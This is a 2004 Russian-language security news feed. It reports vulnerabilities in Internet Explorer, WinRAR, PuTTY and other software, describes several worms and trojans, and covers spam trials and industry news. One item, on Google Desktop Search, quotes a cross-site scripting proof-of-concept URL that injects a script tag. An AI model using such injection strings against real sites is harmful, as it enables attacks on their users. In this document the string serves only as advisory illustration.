Secunia сообщает об обнаружении очередной уязвимости Microsoft Internet Explorer. Степень опасности - чрезвычайно критичная. Уязвимость возникает из-за неправильной проверки границ буфера при обработке некоторых атрибутов ("SRC" и "NAME") тега <IFRAME> в HTML документе, что теоритически может привести к переполнеию буфера и выполнению произвольного кода на уязвимой машине. Уязвимость подтверждена в Internet Explorer 6 на полностью пропатченных Windows XP SP1 и Windows 2000. Уязвимость не присутствует в Windows XP SP2. Степень опасности бюллетеня повышена до "Extremely critical" из-за того, что работающий эксплоит уже опубликован, сообщает Secunia.
Источники: kb.cert.org, secunia.com

4/11/2004 17:58 Уязвимость в Mozilla / Thunderbird
Secunia сообщает об обнаруженной незначительной уязвимости в Mozilla 1.7.x и Mozilla Thunderbird 0.x, которая может быть использована злоумышленниками для получения списка валидных е-майл адресов. Об уязвимости сообщил некто plonk. Уязвимость возникает из-за неправильного поведения броузера при обработке внешних стилей, на которые ссылается HTML документ. Это может быть использовано для проверки существования е-майл адреса, когда специально сформированное письмо будет открыто. Уязвимость подтверждена в версиях Mozilla 1.7.3 и Thunderbird 0.8. Другие версии также могут быть уязвимы. В качестве решения предлагается отключить поддержку HTML при просмотре почтовых сообщений.
secunia.com

4/11/2004 17:57 Червь Yeno щадит пьяниц
"Лаборатория Касперского" и Symantec предупреждают о появлении нового червя Yeno, распространяющегося по электронной почте в виде файлов-вложений с именем Oxney.b.vbs. Червь представляет собой VBS-файл, размером 7КБ. После запуска вредоносная программа выводит на дисплей сообщение с текстом "Are you still drunk...???" (Вы все еще пьяны?). Если ответить "Yes", червь прекращает свою работу, не совершая вредоносных действий. ЕЕсли ответить "No", Yeno создает в системной директории Windows собственную копию, регистрируется в ключе автозапуска реестра и инфицирует все файлы с расширениями .vbs, .vbe, .htm, .html на дисках C, D и E. Кроме того, копии вредоносного кода рассылаются по адресам, найденным в книге контактов Microsoft Outlook.
Источники: "Лаборатория Касперского", Symantec

4/11/2004 17:56 В США впервые осудили спамеров
В Америке впервые осуждены спамеры – брат и сестра, разославшие пользователям AOL миллионы сообщений с рекламой программных продуктов для легкого заработка денег в интернете и заработавшие на них миллионы долларов. Окончательный приговор мошенникам вынесут в феврале следующего года. Суд присяжных города Лисбург в штате Вирджиния признал брата и сестру Джереми Джейнса (Jeremy Jaynes) и Джессику Дегрут (Jessica DeGroot) виновными в незаконном выманивании денег у граждан путем массовой рассылки рекламных электронных писем со скрытым обратным адресом, вводящих получателей в заблуждение. Обвинение просило присяжных посадить мошенника на 15 лет, а его сестру, вина которой была признана не столь значительной, - на меньший срок. Присяжные, в свою очередь, порекомендовали посадить Джейнса на 9 лет, а 28-летнюю Джессику Дегрут оштрафовать на $7,5 тыс., сообщает Associated Press. Интернет-мошенников осудили по новому закону штата Вирджиния, который вступил в силу в прошлом году. Этот закон запрещает массовую рассылку электронных писем со скрытым обратным адресом.
cnews.ru

4/11/2004 17:55 Обнаружен новый троян Alcani
Компания Symantec предупреждает о появлении новой вредоносной программы Alcani. Этот троян, пока не получивший широкого распространения, заражает компьютеры, работающие под управлением операционных систем Microsoft Windows. После проникновения на машину Alcani создает на жестком диске две свои копии и обеспечивает собственный автозапуск при каждом старте ОС. Далее троян посредством интернет-пейджера ICQ отправляет автору уведомления, содержащие IP-адрес инфицированного ПК. Кроме того, вредоносная программа открывает "черный ход" в систему, соединяясь с IRC-серверами irc.dal.net и mesra.dal.net. Дополнительную информацию о трояне Alcani можно найти на сайте Symantec.
Источники: compulenta.ru, symantec.com

4/11/2004 17:53 Sophos: Десятка самых распространненых вирусов октября
Антивирусная компания Sophos, опубликовала отчет о десяти наиболее распространенных вирусах октября 2004. Отчет показывает, что абсолютными лидерами "хит-парада" в октябре были Netsky-P и Zafi-B - в сумме они набрали более 60%, и как и в предыдущем месяце заняли две первые строчки десятки. Надо отметить, что Zafi-B оказался сравнительно долгоживущим, его первое появление было зафиксировано в июне этого года.
Итак 10 вирусов октября 2004:
W32/Netsky-P 35.2%
W32/Zafi-B 28.0%
W32/Netsky-D 7.0%
W32/Netsky-Z 5.8%
W32/Bagle-AA 4.4%
W32/Netsky-B 3.9%
W32/Netsky-Q 2.6%
W32/MyDoom-O 2.2%
W32/Netsky-C 1.9%
W32/Bagle-Zip 1.0%
Другие вирусы 8.0%
sophos.com

4/11/2004 17:52 Выполнение кода через WinRAR (code execution)
Peter Winter-Smith из NGSSoftware сообщает об обнаруженной уязвимости в WinRAR, которая теоритически может привести к выполнению произвольного кода на машине-жертве. Степень опасности уязвимости - средняя. Уязвимость присутствует в модуле восстановления поврежденного архива 'Repair Archive' и поддтверждена в версии 3.40 и более ранних. В версии 3.41 ошибка исправлена, а официальный фикс можно скачать с сайта http://www.rarlabs.com/.
NGSSoftware Insight Security Research

4/11/2004 17:51 Новинка от Panda Software: GateDefender 8000
Panda Software запустила новую серию Panda GateDefender 8000 - ряд выделенных защитных устройств для борьбы с вирусами, нежелательной почтой и веб-контентом. Новые продукты разработаны для удовлетворения требований всех корпоративных сетей, т.к. они предоставляют защиту информационных ресурсов клиентов, обеспечивая при этом наименьший уровень эксплуатационных расходов.Panda GateDefender 8000 - выделенный антивирусный сервер, в котором объединяются аппаратное и программное обеспечение, гарантируя наиболее полную защиту от вирусов, спама и нежелательного веб-контента на уровне соединения с Интернетом.
viruslab.ru

4/11/2004 17:50 Linux - самая незащищенная ОС года
Британская компания mi2g назвала в своем отчете Mac OS X и другие операционные системы на ядре BSD "самыми безопасными и постоянно защищенными" системами года. Самой незащищенной и дырявой системой оказалась Linux. Даже Windows на ее фоне выглядит бастионом надежности. Выводы mi2g построены на основании анализа данных о взломах 235 тысяч постоянно подключенных к Сети серверов, физически расположенных по всему земному шару. Что характерно, на долю Mac OS X и других BSD-систем приходится только 4,82% всех взломов. В то же время, Linux-системы в ответе за 65,64% всех успешных атак. Сервера на базе Windows, сообщает eBCVG.com, ломали лишь в каждом четвертом случае.
securitylab.ru

3/11/2004 16:57 Исходный код Cisco выставлен на продажу
Как сообщает zdnet.ru, Source Code Club вновь открыл свой магазин. Группа рекламирует в онлайне файлы, которые, как она утверждает, содержат исходный код брандмауэра Pix компании Cisco Systems. «SCC рада предложить всем желающим исходный код Cisco Pix 6.3.1. Это солидное предложение, так как Pix является жизненно важным элементом многих особо защищенных сетей», — говорится в постинге группы, который именуется Source Code Club newsletter. ПО предлагается по цене $24 тыс. Source Code Club не указывает источник кода и способ его приобретения. «Мы знаем об этой публикации и изучаем ее, — сказала во вторник представительница Cisco Пенни Брюс, отказавшись от дальнейших комментариев по поводу подлинности исходного кода или его источника. Брюс отметила, что версия 6.3.1 является одной из версий продукта, который вышел в марте 2003 года. В июле этого года Cisco выпустила версию Pix 6.3.4. Source Code Club уже второй раз в этом году публично выставляет на продажу проприетарное ПО. В июле были предложены файлы, якобы содержащие систему обнаружения проникновений Dragon компании Enterasys Networks, а также серверное и клиентское ПО Napster. В мае этого года у Cisco уже произошла утечка исходного кода: проприетарное ПО компании, управляющее ее сетевым оборудованием, в неустановленном объеме оказалось общедоступным в онлайне.
ZDNet

3/11/2004 14:15 Эксплойт для IE — самый популярный хакерский инструмент
Согласно данным, опубликованным компанией ScanSafe, самое большое число хакерских атак во втором квартале было основано на эксплойте для Microsoft Internet Explorer. Лондонская секьюрити-фирма утверждает, что хакерским инструментом No.1 был Exploit.HTML.Mht, который пытается загрузить и установить на компьютер программу, используя пробел в защите браузера Microsoft IE. Этот эксплойт применялся почти вдвое чаще других, отмечает ScanSafe said. «Нас удивили темпы роста числа атак, — говорит директор ScanSafe Рой Тави. — Каждый квартал оно увеличивается на 15%, так что степень реальной угрозы растет. Причем в первую очередь эксплуатируются уязвимости браузера». ScanSafe обнаружила, что 21% вирусных атак приходятся на среду и 6% на конец недели. Причина в том, что большинство вирусов выпускается в выходные и распространяется в течение недели. ScanSafe утверждает, что хотя троянские кони и черви несут в себе значительную угрозу, на долю этих эксплойтов приходится 19% всех наблюдаемых компанией атак. Между тем доля spyware составляет 12% всех атак. Компания обнаружила также, что 10% атак приходится на веб-сайты e-mail.
ZDNet

3/11/2004 13:21 Житель Южной Каролины осужден за интернет-домогательство
Джеймс Роберт Мерфи, житель штата Южная Каролина, признанный виновным в нарушении двух пунктов закона о преследовании личности с использованием интернета, приговорен к пяти годам тюремного заключения условно, сообщает Associated Press. Кроме этого, тридцативосьмилетний Мерфи, арестованный еще в апреле, обязан отработать 500 часов на общественных работах и выплатить 12000 долларов США для возмещения убытков. Мерфи обвиняется в отправке множества писем по электронной почте и сообщений по факсу в адрес служащей муниципалитета Сиэтла Джоэл Лайгон, которая четырнадцать лет назад была его подругой и сотрудницей. Помимо того, что обвиняемый домогался Лайгон, он еще и рассылал ее коллегам письма порнографического содержания якобы от имени самой пострадавшей. Окружной суд США вынес судебное решение согласно федеральному закону от 1997 года, который приравнивает рассылку непристойных писем по электронной почте к хулиганским телефонным звонкам. Изначально Мерфи грозили лишение свободы сроком на два года и штраф в размере 250000 долларов США, но наказание было смягчено по просьбе обвинителей.
CompuLenta

2/11/2004 12:48 OpenBSD 3.4-STABLE более не поддерживается
В связи с выходом нового стабильного релиза операционной системы OpenBSD — 3.6 — уже устаревшая версия 3.4-STABLE более поддерживаться разработчками не будет.Никаких исправлений или обновлений к OpenBSD 3.4 не ожидается, так что всем пользователям этого (или более раннего) релиза строго рекомендуется обновить свою систему.
Источники: nixp.ru, openbsd.org.

2/11/2004 12:43 Октябрьская вирусная двадцатка Касперского
Компания "Лаборатория Касперского" опубликовала список двадцати наиболее распространенных вредоносных программ, досаждавших пользователям Всемирной сети в прошлом месяце. Снова в "хит-параде" лидируют черви семейства NetSky. В целом, различные модификации этого вируса занимают восемь позиций из двадцати. Также в октябре было зафиксировано появление нескольких новых вариантов червей Mydoom и Bagle - версий Mydoom.AB, Bagle.AT и Bagle.AU. Причем Bagle.AT продемонстрировал столь высокую скорость распространения, что буквально за два дня смог подняться до седьмого места. Кроме того, в октябре появилась третья по счету модификация венгерской вредоносной программы Zafi, о которой мы уже сообщали.
kaspersky.ru

2/11/2004 12:42 Вышла новая книга "Расследование компьютерных преступлений в странах СНГ
Сайт crime-research.ru сообщает о выходе новой книги по безопасности. Презентация новой книги Виталия Вехова и Владимира Голубева "Расследование компьютерных преступлений в странах СНГ" прошла 22 октября в Донецком институте внутренних дел МВД Украины. Издание посвящено наиболее актуальным теоретическим и практическим проблемам расследования компьютерных преступлений в странах СНГ. С учетом последних достижений криминалистики изложены методические рекомендации по организации расследования преступлений выделенной категории, тактике производства отдельных следственных действий, розыскной деятельности следователя и его взаимодействии с органами дознания и специалистами.
crime-research.ru

2/11/2004 11:51 Google "залатала" уязвимость в Gmail
Google «залатала» уязвимость в почтовом веб-сервисе Gmail, которая позволяла злоумышленнику красть данные из почтовых ящиков пользователей. По словам представителя Google Натана Тайлера (Nathan Tyler), в настоящее время пользователи Gmail находятся в полной безопасности. Г-н Тайлер отказался сообщить о деталях возникшей проблемы, однако компетентный источник подтвердил, что «дыра» позволяла хакерам получать полный контроль над почтовыми ящиками Gmail. Уязвимость находилась в области, отвечающей за идентификацию пользователей. С помощью ложной ссылки хакер мог получать cookie-файлы и в дальнейшем использовать их для вхождения в систему без пароля. Представители Google утверждают, что пострадала очень небольшая группа пользователей Gmail.
CNews

2/11/2004 11:41 Манипулирование людьми опаснее взлома сетей
По мнению специалистов Gartner, самую большую угрозу информационной безопасности как крупных компаний, так и домашних пользователей Сети в следующие 10 лет будут представлять все более совершенствующиеся методы социальной инженерии, применяемые для взлома существующих средств защиты. Исследователи определяют социальную инженерию как «манипулирование, скорее, людьми, чем машинами, для успешного взлома систем безопасности организации или пользователя». Свой прогноз Gartner представил 31 октября, в преддверии начавшегося вчера в Каннах симпозиума Gartner IT/Expo.
CNews

2/11/2004 11:30 Обнаружена новая модификация червя Zafi
Вирус-червь, распространяющийся через интернет в виде вложений в зараженные электронные письма, а также через локальные и файлообменные сети. Размер файла - 15993 байта.
После запуска копирует свой файл в системный каталог Windows с именами "svchost.com" и "svchost.con". А также в корень диска C: с именем "tm.txt". Создает в системном каталоге Windows файлы с менами "svchost.co0", "svchost.co1", "svchost.co2", ..., "svchost.co9", в которых хранит найденные email-адреса для рассылки зараженных писем. Файлы антивирусных программ перезаписывает своим файлом.
Модификация червя Zafi

1/11/2004 18:40 Комплект для быстрого построения беспроводной сети от U.S. Robotics
Компания U.S.Robotics упростила процесс создания беспроводной сети в малом офисе или дома. Такую сеть можно организовать в любом месте благодаря легко подключаемым устройствам (plug and play). Комплект U.S. Robotics Wireless Network Starter Kit, разработанный к рождественским праздникам, включает в себя беспроводный USB-адаптер 802.11g и беспроводный маршрутизатор 802.11g. Универсальные продукты, входящие в данный комплект, предоставляют пользователям все необходимое для моментального построения беспроводной сети и ее инсталляции за несколько простых этапов.
Легкий USB-адаптер выглядит как компактное устройство флэш-памяти. Его можно включать в любой доступный порт USB (2.0 или 1.1) на настольном компьютере или ноутбуке. В результате компьютер получает прямой доступ к беспроводному маршрутизатору. Питание беспроводного адаптера от порта USB означает, что он использует минимальную мощность передачи. Тем самым увеличивается продолжительность работы портативного компьютера от батареи.
Поставки комплекта U.S. Robotics Wireless Network Starter Kit начнутся в декабре 2004 года. Рекомендуемая цена комплекта — $130-140.
Сетевые решения

29/10/2004 15:01 Эпопея "Bagle" продолжается
"Лаборатория Касперского" сообщает об обнаружении двух новых модификаций известного сетевого червя "I-Worm.Bagle" - "I-Worm.Bagle.at" и "I-Worm.Bagle.au". На настоящий момент экспертами "Лаборатории Касперского" зафиксирована массированая спам-рассылка новых вариантов данного вредоносного кода. По предварительным оценкам, масштабы рассылки оцениваются в несколько миллионов адресов электронной почты. Благодаря использованию спам-технологий, за короткое время "Bagle.at" и "Bagle.au" смогли войти в число самых распространенных вредоносных программ в почтовом трафике. Новые версии известного вируса содержат в себе значительную потенциальную опасность. Они различаются лишь способом упаковки приложенного к зараженной корреспонденции файла, содержащего червя. Для размножения "I-Worm.Bagle.at" и "I-Worm.Bagle.au", как и предшественники, используют процедуру, стандартную для данного вида вредоносных программ. Они сканируют файловую систему пораженного компьютера и рассылают себя по всем найденных в них адресах электронной почты. Помимо этого, угрозу для зараженного компьютера представляет внедренная в тело червей функция почтового прокси-сервера. В результате инфицированная машина может быть использована злоумышленниками для рассылки спама или новых вариантов червя. Определить письмо, содержащее в себе червей "I-Worm.Bagle.at" и "I-Worm.Bagle.au", достаточно просто - такие сообщения выполнены в стереотипной для вирусописателей манере. Письма имеют заголовок "Re:Hello", их текстовое содержание ограничивается значком "смайл", а тело червя приложено к письму.
"Лаборатория Касперского"

29/10/2004 13:26 AOL обеспечит клиентов антивирусной защитой McAfee
America Online, поставщик широкого спектра онлайновых услуг, планирует обеспечить своих 23,4 млн. клиентов новой антивирусной защитой, сообщило агенство Reuters. Клиенты AOL, установившие новую версию AOL 9.0 Security Edition в ноябре, получат бесплатную подписку на McAfee VirusScan Online. Данное программное обеспечение предназначено для обнаружения и удаления вирусов и получения максимально эффективной защиты от интернет-атак. Для остальных подписная цена на продукт McAfee составит 40 долларов в год.
CompuLenta

29/10/2004 11:30 Обход средств защиты клиентских приложений
Порадовал очередной интереснейшей статьёй наш соотечественник 3APA3A, опубликовавший на своём нижегородском сайте (в соавторстве с offtopic, известный посетителямм сайта коллег SecurityLab ;)) анализ исследования, посвящённого возможности обхода средств защиты клиентских приложений. Как пишут авторы, возможность подобного обхода подтверждена в следующих Windows-продуктах: CheckPoint VPN-1(TM) & FireWall-1(R) NG with Application Intelligence (R55) HFA 9, Microsoft Windows XP SP2, Agnitum Outpost Pro 2.1.x, Tiny Firewall Pro v6.0.100, ZoneAlarm Pro with Web Filtering v4.5.594, BlackICE PC Protection 3.6, Kerio Personal Firewall 4.0, WRQ ATGuard v3.2. "Эта статья не является попыткой научить скрипт-кидди писать троянские программы, и уж тем более не попытка создать подобную программу авторами. Это предложение сообществу специалистов в области безопасности начать осуждение механизмов защиты клиентских приложений. Авторы приносят свои извинения тем производителям, продукты которых содержат описанные в статье уязвимости. Авторы уверены, что решать надо не конкретные проблемы, но менять отношение к защите клиентских приложений, что требует архитектурных модификаций средств защиты. Если ситуация не изменится, любой школьник, умеющий писать программы на Бейсике сможет получить доступ в защищенную сеть". В статье продемонстрированы следующие техники: обход фильтров содержимого на персональных и корпоративных межсетевых экранах; обход защиты сетевого взаимодействия на персональных межсетевых экранах; обход контроля целостности на персональных межсетевых экранах. В качестве инструмента демсонстрации возможностей обхода защиты использовалась CAT (Client Application Trojaning), использующая COM для запуска и контроля клиентского приложения (Internet Explorer).
Cтатья

29/10/2004 11:15 Уязвимость в Internet Explorer
Benjamin Tobias Franz из Германии сообщает об уязвимости в Internet Explorer 6.0.2800.1106 (полнопатченном). Суть уязвимости сводится к возможности обмана пользователя из-за некоректной обработки IE тегов таблиц, если они указаны в ссылке (a href). Используя подобную "особенность" IE можно ввести в заблуждение пользователя, т.к. при наведении мышки на ссылку в строке состояния будет показан совершенно не тот сайт. который откроется при клике на ссылку. Подобная особенность характерна также для Microsoft Outlook Express. Автором приводится пример эксплоита. В качестве временной меры (насколько временной, не указывается), предлагается на кликать по ссылкам на потенциально неблагонадёжных сайтах.
Описание

29/10/2004 10:42 Выход Apache 1.3.33
Группа разрабочиков проекта Apache Software Foundation сообщает о выходе новой версии этого популярного Вэб-сервера - 1.3.33. Примечательно, что версия 1.3.32 так и не была полностью выпущена. В новой версии устранены 2 уязвимости, обнаруженные после выхода версии 1.3.31, а также несколько багов. Уязвимости: потенциальное переполнение буфера с применением эскейп-последовательностей в тегах SSI (Server-Side-Includes), отклонение ответа удалённого сервера при посылке некорректного (отрицательного) поля Content-Length. В новой версии добавлены также 2 новых особенности
Официальный анонс

29/10/2004 10:27 Новая защита для Linux-систем от "Анкад"
Компания "Анкад" представила программу "Криптон-Дозор", которая обеспечивает администратору безопасности возможность мониторинга попыток доступа пользователей на рабочие станции, подключенные к сети под управлением ОС Linux. Система производит непрерывный аудит событий доступа с использованием аппаратных модулей электронного замка "Криптон-Замок" и простой процедуры логинов. Регистрация событий и обработка команд администратора ведется на сервере MySQL, установленном на платформе Linux 2.4.х или Windows-2000/XP. Подсистема "Монитор событий" оперативно отображает поток событий и выполняет заданные администратором реакции на них в виде аудио-оповещений, видео-заставок или запуском определенных приложений и команд.
"Открытые системы"

29/10/2004 10:15 Антивирусы Panda Software признаны неуязвимыми
По результатам исследований американской компании iDefense, антивирусные решения компании Panda Software были признаны неуязвимыми для действий хакеров и злоумышленников. Компания iDefense занимается исследованиями в сфере информационной безопасности с последующей публикацией результатов проведенных работ. Как было выявлено в результате исследования, антивирусное программное обеспечение не всех производителей идеально и полностью защищает компьютеры пользователей от вторжений хакеров. В соответствии с информацией, представленной на сайте iDefense, общая софтверная ошибка позволяет злоумышленникам провести свои программы, минуя противовирусные ловушки. Многие другие технологии также не обеспечивают защиты от вредоносных программ. Хакеры, использующие ZIP-файлы с модифицированными заголовками, способны внедрить вирусы в систему пользователя, не вызвав никаких подозрений у вышеназванных антивирусных движков. Проблема, в первую очередь, касается файлов, созданных с помощью WinZIP. Однако антивирусы Panda Software, наряду с аналогичными продуктами некоторых других производителей, были занесены в список неуязвимого программного обеспечения, способного противостоять действиям злоумышленников. Нужно отметить, что в этот перечень не попали программы ни одного российского антивирусного производителя.
Отчёт iDefense

29/10/2004 09:59 Сайты бразильского правительства подверглись атаке
Более 200 сайтов, принадлежащих государственным ведомствам Бразилии, оказались взломаны в минувший понедельник. Хакерская атака, возможно, стала для ее организатора способом выражения своей политической позиции, сообщает сайт ZDNet. Провести столь масштабную атаку хакеру удалось после того, как он обошел защиту интернет-провайдера, предоставляющего хостинг правительственным сайтам Бразилии. На некоторых из атакованных сайтов хакер поместил оскорбительные антиправительственные лозунги, на некоторых - фото женского глаза. "С большой долей вероятности можно говорить о политических мотивах атаки - многие подобные атаки связаны с политикой. Я бы не хотел говорить, насколько защищено бразильское правительство. Однако атака показывает степень его уязвимости", - прокомментировал инцидент один из экспертов в области безопасности. Большая часть последствий хакерской атаки на бразильские сайты уже ликвидирована. Однако скриншоты с атакованных веб-ресурсов по-прежнему можно увидеть на сайте www.zone-h.org.
VirusList

29/10/2004 09:26 Novell парирует e-mail Microsoft
В ответ на последнюю атаку Стива Баллмера на Linux компания Novell обвинила Microsoft в выборочном использовании пристрастных отчетов в поддержку своих заявлений. Очередная атака Microsoft на Linux, выразившаяся в том, что исполнительный директор Стив Баллмер повторил основные темы пресловутой кампании Get The Facts, встретила решительный отпор со стороны Novell, которая обвиняет софтверного гиганта в необъективности. В электронном письме, разосланном заказчикам и партнерам Microsoft в эту среду, Баллмер утверждает, что Windows превосходит Linux по безопасности, простоте обучения, общей стоимости владения (TCO) и защищенности от судебных исков за нарушение патентов. Вице-президент Novell Джон Хоуган и старший бизнес-аналитик Барретт Кокли раскритиковали это письмо по пунктам и заявили, что Microsoft выбирала только те разделы отчетов, которые согласуются с ее «фактами». «Не удивительно, что в доводах, приведенных г-ном Баллмером, используются только те положения заказных исследований, которые характеризуют Microsoft с самой положительной стороны, — говорит Хоуган. — Однако более широкий взгляд рисует гораздо более объективную картину, благоприятную для Linux». Хоуган из Novell поставил под сомнение и утверждение Баллмера, будто цитируемые отчеты являются непредвзятыми, приводя пример, в котором Microsoft была разрешена тонкая настройка конфигурации, тогда как Linux работала на эмуляторе.
Письмо Хоугана

29/10/2004 09:10 В Интернете появятся новые домены .post и .travel
Новые доменные зоны .post и .travel получили предварительное одобрение Корпорации по распределению имен и номеров в Интернете (ICANN) и могут появится в Сети уже в начале 2005 года, сообщает Associated Press. Решение по выделению новых доменных зон основывалось на оценке коммерческих и технических описаний, которые представили спонсоры планируемых доменов. После первичного одобрения начались переговоры о создании новых зон и об управлении ими, говорится в пресс-релизе ICANN. Это может занять несколько месяцев, однако отмечается, что решение о создании новых зон пока не окончательное. В то же время в процессе утверждения находится создание других доменных зон, в числе которых .asia, .jobs, и .xxx (последняя - для сайтов "взрослой" тематики). Кроме того, рассматривается предложение о создании зоны .eu для Европейского союза. На регистрацию домена первого уровня .travel для турагентов, авиакомпаний и гостиничных сетей подала заявку ассоциация туроператоров Travel Partnership, а введение зоны .post предложил Всемирный почтовый союз. Обе компании выделили за рассмотрение своих предложений 45 тысяч долларов на спонсорство новых доменов.
Lenta.Ru

28/10/2004 14:43 Уязвимость в Quicktime for Windows
Британская NGSSoftware сообщает об уязвимости в популярном мультимедиа ПО Quicktime for Windows, выпускаемом Apple. О деталях уязвимости, следуя собственной политике, NGSSoftware не сообщает, однако утверждается, что она присутствует во всех версиях меньше 6.5.2 (включительно). На сайте производителя доступен патч, ссылка на который приведена ниже.
Обновления

28/10/2004 13:18 Avaya выпустила ПО для слежения за сотрудниками
Компания Avaya получила патент на программное обеспечение для центров контактов, предназначенное для оптимизации распределения задач между сотрудниками, работающими вне офиса и мобильными сотрудниками - Location Enhanced Automatic Work Distribution. Этот продукт оценивает характеристики мобильной рабочей силы компании и выбирает подходящего сотрудника или ресурс для выполнения текущей задачи и достижения оптимального уровня обслуживания. Location Enhanced Automatic Work Distribution может использоваться в центрах обработки вызовов для назначения задач представителям мобильной группы сотрудников компании, например, водителям такси, курьерам, перевозящим грузы, а также инженерам, обслуживающим оборудование на объекте заказчика. Продолжительность нахождения сотрудника в пути, информация о его местоположении, получаемая при помощи системы глобального позиционирования (Global Positioning System), а также другие методы позволяют определить местоположение сотрудников и распределить задания между ними. Также возможна интеграция дополнительных показателей, указывающих, сможет ли сотрудник исполнить необходимые задания с учетом текущего состояния склада и других значимых факторов.
"Открытые системы"

28/10/2004 12:44 We all live in a Windows submarine...
Британское правительство защищает свое решение о внедрении Microsoft Windows 2000 на некоторых кораблях военно-морского флота. Члены парламента и секьюрити-эксперты попросили министра обороны Джефа Хуна объяснить, почему министерство выбрало эту операционную систему, вместо Unix, для своих субмарин и кораблей. Сейчас Windows 2000 установлена на эскадренном миноносце класса 45 и некоторых подводных лодках Trafalgar, однако министерство утверждает, что оно еще не прииняло окончательного решения по ее применению на новых атомных подлодках Vanguard. «Мы не просто загрузили кругом Windows и умыли руки, — сказал представитель министерства. — Для этого существует длительный период тестирования. Мы удовлетворены безопасностью Windows 2000, ее надежностью и будем действовать соответствующим образом. Она прошла независимую оценку по самым строгим критериям. Безопасность всех наших атомных подводных лодок имеет первостепенное значение, и мы не собираемся брать на борт систему, которая угрожает этой безопасности». Секьюрити-эксперты, включая бывших профессиональных военных, когда услышали о решении правительства, обратились к либеральным демократам, а те — к Хуну с просьбой объяснить причины, по которым на кораблях используется Windows 2000. «Мы крайне обеспокоены, — сказал консультант по обороне партии либеральных демократов Мэтт Уолдман. — Windows не считается надежной системой, и мы хотим знать, действительно ли она подходит для военных кораблей и подводных лодок. Мы хотим получить свидетельства, которые объясняли бы, почему для защиты от хакеров не используются альтернативные системы. Нам нужны ответы, и мы хотим получить их быстро. Особенно в условиях, когда за все более изощренными террористическими актами стоят все более серьезные деньги».
ZDNet

28/10/2004 12:10 Дыра в поисковой системе Google Desktop Search
В недавно выпущенном инструментарии Google Desktop Search обнаружена уязвимость, сообщает "Компьюлента". Google Desktop Search позволяет осуществлять полнотекстовый поиск в обычных текстовых файлах, документах Microsoft Word, Excel, Powerpoint, электронных сообщениях и логах интернет-пейджера AOL Instant Messenger (AIM), хранящихся на локальных накопителях. Найденная дыра, как сообщается, может использоваться злоумышленниками с целью проведения XSS-атак (Cross-Site Scripting) на удаленные компьютеры. Для реализации нападения достаточно вынудить жертву загрузить составленный особым образом URL. Вредоносная строка может выглядеть следующим образом: "http://[target]/search?q=txt&meta="><script>alert("BUG")</script><a = ".
Описание

28/10/2004 09:34 AOL хочет посадить трех спамеров-мошенников на 15 лет
В американском штате Вирджиния начался процесс над тремя гражданами, обвиняемыми в мошенничестве посредством рассылки спама. Как отмечает Associated Press, это первое в США дело подобного рода, когда поводом для привлечения к суду является не просто спам, а спам, комбинированный с мошенничеством в крупном размере. Трое американцев обвиняются в том, что разослали клиентам провайдера AOL несколько миллионов спамерских сообщений, содержащих предложения заработать много денег с помощью нескольких стандартных мошеннических схем наподобие пирамидальных денежных сборов. При этом спамеры прикрывались фальшивыми обратными адресами и указывали в качестве имен отправителей чужие имена. Спамеров вычислили и от имени AOL на них был подан иск по месту нахождения штаб-квартиры AOL в Вирджинии, хотя сами обвиняемые живут в штате Северная Каролина. Между тем, Вирджиния имеет самые строгие в США антиспамерские законы, и если обвиняемые - двое мужчин и женщина (сестра одного из них) - будут признаны виновными по всем пунктам, то им грозит тюремное заключение на срок до 15 лет.
Lenta.Ru

28/10/2004 09:09 Госдума запретила пить пиво на улице
Хоть эта новостть и не имеет прямого отношения к безопасности и сетям, но всё же... ;) Госдума приняла во втором чтении законопроект, ограничивающий продажу и потребление пива в общественных местах, передает РИА "Новости". Документ запрещает розничную продажу напитка в детских, образовательных, медицинских организациях и на прилегающих к ним территориях. Также не разрешается его продажа несовершеннолетним. Законопроект вводит запрет на распитие пива на улицах, стадионах, скверах, парках, в общественном транспорте и других общественных местах, за исключением заведений общественного питания, а также мест розничной продажи напитка. При необходимых 226 голосах документ поддержали 429 депутатов, один парламентарий высказался против. Предполагается, что закон вступит в силу с 1 апреля 2005 года. Возможно, конечно, что смысл в этом законе есть, однако, учитывая специфику нашей страны, скорее всего его соблюдение, как всегда, пойдёт с перегибами. Кстати, хотелось бы заметить, что уж нашим доблестным депутатам пить пиво в "общественных" местах и до этого вряд ли удавалось. ;)
РИА "Новости"

28/10/2004 01:45 В США одобрено применение микросхем вживляемых в тело человека
В США, после долгих дискуссий, Управление по надзору за качеством пищевых продуктов и медикаментов США (US Food and Drug Administration) одобрило применение специальных микросхем VeriChip, вживляемых в тело человека, для использования их в медицинских целях. Микросхема VeriChip имеет размер с зерно риса, вводится под кожу на руке с помощью шприца. Процедура его вживления занимает менее 20 минут и не оставляет следов на коже пациента. Сама по себе VeriChip не содержит медицинских записей, а только код доступа к защищенной базе данных, который может быть считан специальным сканером. Таким образом будет вестись электронная медицинская карта пациента. Президент США Джордж Буш пообещал обеспечить в ближайшее десятилетие большинство американцев электронными медицинскими карточками, а национальное министерство здравоохранения со своей стороны выделило $139 млн. в виде грантов на эти цели.
CNews.ru

28/10/2004 01:25 Переполнение буфера в RealPlayer/RealOne
eEye Digital Security сообщила об обнаружении возможности переполнения буфера в программах просмотра потокового видео RealPlayer 10.5(6.0.12.1056/6.0.12.1040/6.0.12.1016)/10 и RealOne Player v2/v1. Переполнение буфера вызывается ошибкой в работе динамической библиотеки "DUNZIP32.dll" при попытке установить специально модифицированные скины для программы. Использование данной уязвимости может привести к выполнению произвольного программного кода. Для устранения уязвимости разработчики советуют воспользоваться функцией "Check for Update" доступной в подверженных описанной уязвимости программах.
RealNetworks

28/10/2004 01:05 Опасная уязвимость в telnet-клиенте PuTTY
Обнаружена опасная уязвимость в популярном telnet/ssh-клиенте PuTTY. Уязвимость заключается в возможности переполнения буфера из-за некорректной обработки длинных строк функцией "ssh2_rdpkt()", последствием которой может стать возможность выполнения произвольного программного кода еще до прохождения верификации на SSH2 сервере. Данная уязвимость была устранена в новой версии программы PuTTY 0.56.
iDEFENSE Security Advisory

26/10/2004 15:00 Очередная хакерская игра
Как известно, в Интернете периодически появляются так называемые хакерские игры, часть из которых сводится к взлому выставляемого сервера, часть в необходимости прохождения определённых уровней, чтобы в итоге достигнуть некоего высшего уровня. В BUGTRAQ о ещё одной подобной игре объявили держатели сайта Hack Dot AE. Игре дано название ‘UAE Web Hacking Challenge’. Предлагается пройти 10 уровней, каждый из которых состоит в необходимости преодоления некоей защиты. Соответственно, чем выше уровень, тем больших навыков и знаний он требует. Желающиее поучаствовать и проверить свои силы - WELCOM.
Сайт игры

